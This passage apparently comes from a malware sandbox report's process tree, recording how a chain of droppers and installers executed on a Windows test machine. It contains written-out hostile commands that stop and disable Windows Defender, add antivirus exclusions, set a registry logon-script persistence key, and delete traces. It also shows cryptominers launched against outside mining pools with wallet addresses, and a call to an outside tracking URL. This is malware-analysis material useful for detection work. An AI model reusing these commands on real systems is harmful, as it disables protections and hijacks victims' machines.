        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xgrkcfi4.x0v\askinstall31.exe & exit
        15⤵
        
        PID:6816
        
        C:\Users\Admin\AppData\Local\Temp\xgrkcfi4.x0v\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\xgrkcfi4.x0v\askinstall31.exe
        16⤵
        
        PID:7128
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dcjcpjne.eoz\toolspab1.exe & exit
        15⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\dcjcpjne.eoz\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dcjcpjne.eoz\toolspab1.exe
        16⤵
        
        PID:6696
        
        C:\Users\Admin\AppData\Local\Temp\dcjcpjne.eoz\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dcjcpjne.eoz\toolspab1.exe
        17⤵
        
        PID:3796
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5xanmog.4gw\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:2620
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcqlf5sr.azk\setup_10.2_mix.exe & exit
        15⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\tcqlf5sr.azk\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\tcqlf5sr.azk\setup_10.2_mix.exe
        16⤵
        
        PID:7204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itkz5qha.1x0\file.exe & exit
        15⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\itkz5qha.1x0\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\itkz5qha.1x0\file.exe
        16⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        17⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Local\Temp\JAZTV1TZAJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JAZTV1TZAJ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\JAZTV1TZAJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JAZTV1TZAJ\multitimer.exe" 1 3.1617536981.6069a7d53e631 101
        19⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\JAZTV1TZAJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JAZTV1TZAJ\multitimer.exe" 2 3.1617536981.6069a7d53e631
        20⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\qzcluzh1rxl\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qzcluzh1rxl\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:8988
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\a1d35157-4980-461e-a3c3-c40e9ae4a636\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a1d35157-4980-461e-a3c3-c40e9ae4a636\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a1d35157-4980-461e-a3c3-c40e9ae4a636\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:4160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a1d35157-4980-461e-a3c3-c40e9ae4a636\test.bat"
        24⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:8408
        
        C:\Users\Admin\AppData\Local\Temp\runlt1dhljx\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\runlt1dhljx\app.exe" /8-23
        21⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\kzyuziyy1dc\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kzyuziyy1dc\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\is-OQMOI.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OQMOI.tmp\Setup3310.tmp" /SL5="$30700,138429,56832,C:\Users\Admin\AppData\Local\Temp\kzyuziyy1dc\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:9068
        
        C:\Users\Admin\AppData\Local\Temp\is-129J2.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-129J2.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:7772
        
        C:\Users\Admin\AppData\Local\Temp\bhvzd5ddkdf\byzz130y1mb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bhvzd5ddkdf\byzz130y1mb.exe" /ustwo INSTALL
        21⤵
        
        PID:8996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "byzz130y1mb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bhvzd5ddkdf\byzz130y1mb.exe" & exit
        22⤵
        
        PID:9024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "byzz130y1mb.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:6140
        
        C:\Users\Admin\AppData\Local\Temp\kv0j3vgdjn5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kv0j3vgdjn5\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:8972
        
        C:\Users\Admin\AppData\Local\Temp\is-OLH0A.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OLH0A.tmp\vict.tmp" /SL5="$506F8,870426,780800,C:\Users\Admin\AppData\Local\Temp\kv0j3vgdjn5\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:9076
        
        C:\Users\Admin\AppData\Local\Temp\is-K6MV4.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-K6MV4.tmp\win1host.exe" 535
        23⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\VR6MVSGZNP\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VR6MVSGZNP\setups.exe" ll
        18⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\is-KH54D.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KH54D.tmp\setups.tmp" /SL5="$50370,454998,229376,C:\Users\Admin\AppData\Local\Temp\VR6MVSGZNP\setups.exe" ll
        19⤵
        
        PID:7088
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        17⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
        17⤵
        
        PID:7576
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:7672
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        17⤵
        
        PID:7812
        
        C:\Users\Admin\AppData\Roaming\3B91.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\3B91.tmp.exe"
        18⤵
        
        PID:8204
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:8236
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:8424
        
        C:\Users\Admin\AppData\Roaming\46FC.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\46FC.tmp.exe"
        18⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        18⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:9112
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
        17⤵
        
        PID:8780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oqvmasno.dks\app.exe /8-2222 & exit
        15⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\oqvmasno.dks\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\oqvmasno.dks\app.exe /8-2222
        16⤵
        
        PID:6008
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kpxhsmzw.qgw\Four.exe & exit
        15⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\kpxhsmzw.qgw\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\kpxhsmzw.qgw\Four.exe
        16⤵
        
        PID:8740
        
        C:\Users\Admin\AppData\Local\Temp\Q2OIROK2ZA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q2OIROK2ZA\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:8492
        
        C:\Users\Admin\AppData\Local\Temp\Q2OIROK2ZA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q2OIROK2ZA\multitimer.exe" 1 3.1617537057.6069a8214884a 104
        18⤵
        
        PID:6236
        
        C:\Users\Admin\AppData\Local\Temp\Q2OIROK2ZA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q2OIROK2ZA\multitimer.exe" 2 3.1617537057.6069a8214884a
        19⤵
        
        PID:8600
        
        C:\Users\Admin\AppData\Local\Temp\MYMRVYDSE3\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MYMRVYDSE3\setups.exe" ll
        17⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\is-4DAIH.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4DAIH.tmp\setups.tmp" /SL5="$4072E,454998,229376,C:\Users\Admin\AppData\Local\Temp\MYMRVYDSE3\setups.exe" ll
        18⤵
        
        PID:7900
        
        C:\Users\Admin\AppData\Local\Temp\dd-df011-834-d0cb3-34fd876cc2dd0\Tibikosodo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dd-df011-834-d0cb3-34fd876cc2dd0\Tibikosodo.exe"
        14⤵
        
        PID:300
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1952
        15⤵
        
        PID:2160
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:5316
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:2148
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:4128
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\YB2AD3JADF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YB2AD3JADF\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\YB2AD3JADF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YB2AD3JADF\multitimer.exe" 1 3.1617536652.6069a68c78254 103
        13⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\YB2AD3JADF\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YB2AD3JADF\multitimer.exe" 2 3.1617536652.6069a68c78254
        14⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\x0pb0u0dgoa\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x0pb0u0dgoa\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\is-07AF7.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-07AF7.tmp\vict.tmp" /SL5="$B0032,870426,780800,C:\Users\Admin\AppData\Local\Temp\x0pb0u0dgoa\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\is-PVV25.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-PVV25.tmp\win1host.exe" 535
        17⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\irudldvnxu3\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\irudldvnxu3\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:6348
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:6732
        
        C:\Users\Admin\AppData\Local\Temp\8c35eaea-2990-47f3-ace5-7c2c7522f00b\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8c35eaea-2990-47f3-ace5-7c2c7522f00b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8c35eaea-2990-47f3-ace5-7c2c7522f00b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        17⤵
        
        PID:6360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8c35eaea-2990-47f3-ace5-7c2c7522f00b\test.bat"
        18⤵
        
        PID:4664
        
        C:\Windows\system32\sc.exe
        
        sc stop windefend
        19⤵
        
        PID:4804
        
        C:\Windows\system32\sc.exe
        
        sc config windefend start= disabled
        19⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        17⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        17⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        18⤵
        Delays execution with timeout.exe
        
        PID:6956
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        17⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 1552
        17⤵
        Program crash
        
        PID:4828
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\lne45nzjsqj\qb3utnkgtnu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lne45nzjsqj\qb3utnkgtnu.exe" /ustwo INSTALL
        15⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "qb3utnkgtnu.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lne45nzjsqj\qb3utnkgtnu.exe" & exit
        16⤵
        
        PID:6580
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "qb3utnkgtnu.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\tkln153vxxj\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tkln153vxxj\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\is-L304D.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L304D.tmp\Setup3310.tmp" /SL5="$20470,138429,56832,C:\Users\Admin\AppData\Local\Temp\tkln153vxxj\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\is-A329P.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-A329P.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\djv4ubfu1c3\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\djv4ubfu1c3\app.exe" /8-23
        15⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\djv4ubfu1c3\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\djv4ubfu1c3\app.exe" /8-23
        16⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\wc150bpfeoj\q0vjr4ydhzl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wc150bpfeoj\q0vjr4ydhzl.exe" /quiet SILENT=1 AF=756
        15⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wc150bpfeoj\q0vjr4ydhzl.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wc150bpfeoj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617277425 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        16⤵
        
        PID:6320
        
        C:\Users\Admin\AppData\Local\Temp\anglqkumi4o\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\anglqkumi4o\vpn.exe" /silent /subid=482
        15⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\is-NN2DH.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NN2DH.tmp\vpn.tmp" /SL5="$204DE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\anglqkumi4o\vpn.exe" /silent /subid=482
        16⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\1JOQOPRK9E\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1JOQOPRK9E\setups.exe" ll
        12⤵
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\is-25QC9.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-25QC9.tmp\setups.tmp" /SL5="$50276,454998,229376,C:\Users\Admin\AppData\Local\Temp\1JOQOPRK9E\setups.exe" ll
        13⤵
        
        PID:4092
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"
        11⤵
        
        PID:568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:4228
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Local\Temp\sbrwdzd033o\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sbrwdzd033o\app.exe" /8-23
        8⤵
        Executes dropped EXE
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\sbrwdzd033o\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sbrwdzd033o\app.exe" /8-23
        9⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Local\Temp\4ssmi5cj1fz\qmsnznbfqfc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4ssmi5cj1fz\qmsnznbfqfc.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:584
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "qmsnznbfqfc.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4ssmi5cj1fz\qmsnznbfqfc.exe" & exit
        9⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "qmsnznbfqfc.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\0qy5b1uhd03\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0qy5b1uhd03\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\is-IILH4.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IILH4.tmp\IBInstaller_97039.tmp" /SL5="$30382,14574507,721408,C:\Users\Admin\AppData\Local\Temp\0qy5b1uhd03\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1044
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-NC9KH.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-NC9KH.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        Drops file in Windows directory
        
        PID:3976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
        10⤵
        
        PID:1396
        
        C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
        10⤵
        
        PID:4024
    - - C:\Users\Admin\AppData\Local\Temp\JJSLRGLT2W\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JJSLRGLT2W\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3096
      - C:\Users\Admin\AppData\Local\Temp\is-J531N.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J531N.tmp\setups.tmp" /SL5="$5005A,454998,229376,C:\Users\Admin\AppData\Local\Temp\JJSLRGLT2W\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:4508
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:3108
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"
      4⤵
      Executes dropped EXE
      PID:4384
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:4840
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:808
    - - C:\Users\Admin\AppData\Roaming\921A.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\921A.tmp.exe"
        5⤵
        
        PID:6004
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:1408
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:5684
    - - C:\Users\Admin\AppData\Roaming\9B53.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9B53.tmp.exe"
        5⤵
        
        PID:3824
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9B53.tmp.exe
        6⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:5280
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:5888
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:5176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:4700
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
